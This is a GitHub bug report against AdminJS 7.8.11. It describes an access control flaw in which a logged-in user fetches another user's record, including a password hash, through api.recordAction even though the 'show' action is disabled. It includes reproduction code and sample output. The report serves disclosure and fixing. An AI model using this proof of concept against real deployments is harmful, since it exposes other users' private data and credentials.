Skip to content

[Bug]: Security. Get someone else's user #1706

New issue
New issue
Closed
#1707
Closed
[Bug]: Security. Get someone else's user#1706
#1707
Labels
bugSomething isn't working
@pogudin-sergey

Description

@pogudin-sergey
pogudin-sergey
opened on Aug 27, 2024

Contact Details

No response

What happened?

By logging in as any user, you can get the data of other users, even if it is prohibited by the resource.

This code return any user into error object:

const result = await api.recordAction({
        resourceId: 'Users',
        actionName: 'show',
        recordId: '1',
});

Example:

Resource

import { ResourceWithOptions } from 'adminjs';
import { User } from '../models/index.js';

const UserResource: ResourceWithOptions = {
  resource: User,
  options: {
    actions: {
      new: {
        isAccessible: false,
      },
      delete: {
        isAccessible: false,
      },
      bulkDelete: {
        isAccessible: false,
      },
      list: {
        isAccessible: false,
      },
      edit: {
        isAccessible: false,
      },
      show: {
        isAccessible: false,
      },
      search: {
        isAccessible: false,
      },
    },
  },
}

export { UserResource }

Test page

import React, { useEffect } from 'react';
import { useSelector } from 'react-redux';
import { ApiClient, ReduxState } from 'adminjs';

const api = new ApiClient();

export const Page2: React.FC = () => {
  const session = useSelector((state: ReduxState) => state.session);

  async function test() {
    console.log('Current user', session);

    const result = await api.recordAction({
      resourceId: 'Users',
      actionName: 'show',
      recordId: '1',
    });
    result.data.record.id ? console.error('SHOW ALIEN: FAIL', result) : console.log('SHOW ALIEN: OK');
  }

  useEffect(() => {
    test();
  }, []);

  return (<></>)
}

export default Page2

Result

// Current user
{
    "email": "user2",
    "id": 2,
    "name": "Test user 2",
    "theme": "light",
}

// api.recordAction result. Result is cutted
{
    "data": {
        "record": {
            "params": {
                "id": 1,
                "email": "user1",
                "password": "28a53d1feb12433aa577d60c0cadd27e",
                "name": "Admin",
                "theme": "dark",
                "createdAt": "2023-11-17T16:56:33.555Z",
                "updatedAt": "2024-08-26T18:37:47.819Z"
            },
            "populated": {},
            "baseError": {
                "message": "forbiddenError",
                "type": "ForbiddenError"
            },
            "errors": {},
            "id": 1,
            "recordActions": [],
            "bulkActions": []
        },
        "records": [],
        "notice": {
            "message": "forbiddenError",
            "type": "error"
        }
    },
    "status": 200,
    "statusText": "OK",
}

Result is 'forbiddenError', but record 1 is returned!

Bug prevalence

always

AdminJS dependencies version

7.8.11

What browsers do you see the problem on?

No response

Relevant log output

No response

Relevant code that's giving you issues

No response

Metadata

Metadata

Assignees

No one assigned

    Labels

    bugSomething isn't working

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions